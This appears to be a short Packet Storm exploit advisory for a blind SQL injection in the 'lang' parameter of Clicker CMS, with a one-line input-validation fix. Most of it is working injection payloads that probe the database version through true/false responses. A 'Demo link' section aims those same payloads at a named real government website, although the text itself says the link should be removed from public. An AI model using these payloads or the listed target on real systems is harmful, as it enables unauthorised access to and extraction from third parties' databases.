Clicker CMS suffers from a remote blind SQL injection vulnerability.
53aea5f301dea447bd0f5913090b5b594b7d6628bde172f9b26819d0ed7cfae8
# Exploit Title: Clicker CMS Blind SQL Injection Vulnerability
# Date: 2010-06-25
# Author: hacker@sr.gov.yu
# Software Link: n/a
# Version: n/a
####################################################################
.:. Author : hacker@sr.gov.yu
.:. Contact: hacker@evilzone.org, hacker@sr.gov.yu(MSN)
.:. Home : www.evilzone.org, www.balcan-security.com
.:. Script : Clicker CMS
.:. Bug Type : Blind Sql Injection
.:. Risk: High
.:. Tested on : Windows & Linux
####################################################################
===[ Exploit ]===
.:. It was found that Clicker CMS does not validate properly the "lang"
parameter value.
http://server/index.php?lang=4[BSQLi]
===[ Example ]===
http://server/index.php?lang=4 and substring(@@version,1,1)=5-- (true or false)
http://server/index.php?lang=4 and substring(@@version,1,1)=4-- (false or true)
===[ Solution ]===
.:. Input validation of "lang" parameter should be corrected.
Greetz to ALL EVILZONE.org && BALCAN-SECURITY.com members!!!
Pozdrav za sve iz Srbije!!! :-)))
------------------------------------------------------------------------------------------------------------------------
Demo link(remove it from public):
http://www.fmpvs.gov.ba/index.php?lang=4 and substring(@@version,1,1)=5-- TRUE
http://www.fmpvs.gov.ba/index.php?lang=4 and substring(@@version,1,1)=4-- FALSE
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed